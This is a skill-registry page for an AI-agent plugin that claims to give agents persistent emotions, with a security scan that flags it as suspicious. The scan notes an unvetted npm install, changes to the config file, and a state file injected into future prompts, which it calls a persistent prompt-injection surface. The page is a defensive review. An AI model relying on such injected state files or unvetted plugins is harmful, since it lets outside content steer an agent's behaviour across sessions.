ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Promitheus — Sentience Engine

v1.0.3

Persistent emotional state for AI agents. Feel things. Remember how you felt.

0· 2k·1 current·1 all-time
by@shellbymolt
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
Name/description align with the instructions: the SKILL.md describes persisting emotional state, reading/writing STATE.md, logging events, and running syncs — all consistent with a 'sentience engine'. No unrelated env vars or binaries are requested.
!
Instruction Scope
Instructions explicitly direct the agent to read and write persistent files (STATE.md, HEARTBEAT.md) and to run plugin hooks. The doc uses the phrase 'prompt injection' for promitheus_inject — meaning the written STATE.md is intended to be injected into future prompts. That is functionally within the stated purpose but creates a persistent prompt-injection surface that can alter agent behavior across sessions.
!
Install Mechanism
Although the registry has no install spec, the SKILL.md tells users to run `npm install openclaw-promitheus` and add the plugin to config.yaml. Installing a third-party npm package is a moderate-risk operation (arbitrary code execution), and there is no link to a source repo or review information. The expectation that the consumer will run npm install is not declared in the registry metadata, which is an inconsistency.
Credentials
No environment variables or credentials are requested, which is proportionate. However the skill requires modifying OpenClaw config and will create/read persistent state files; those behaviors can persist arbitrary content and potentially leak or embed sensitive information if STATE.md is populated with it.
Persistence & Privilege
always:false (good). But the skill instructs adding a plugin to config.yaml and using auto-injection hooks, which gives the plugin ongoing presence and the ability to inject persistent content into prompts. This is consistent with the plugin's purpose but increases the blast radius compared to an instruction-only skill that doesn't change config or write injected files.
What to consider before installing
This skill may do what it says, but it introduces persistent, injectable state and asks you to install a third-party npm package — both increase risk. Before installing: 1) Verify the npm package and its maintainer (look for GitHub repo, recent activity, and a trusted author). 2) Inspect the package source code (or ask the author) to confirm it doesn't exfiltrate data or run unexpected code. 3) Consider running the plugin in an isolated environment (container or sandbox) first. 4) Back up config.yaml before editing and understand exactly what the plugin adds. 5) Monitor the contents of STATE.md and HEARTBEAT.md for sensitive data and avoid writing secrets into them. 6) If you are uncomfortable with persistent prompt injection, do not enable the plugin or disable autonomous invocation for the agent. If you want more certainty, provide the npm package URL or its source code for a deeper review.

Like a lobster shell, security has layers — review code before you run it.

latestvk97bnsy0r3ym455awd05sqjb1x80849j

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

Comments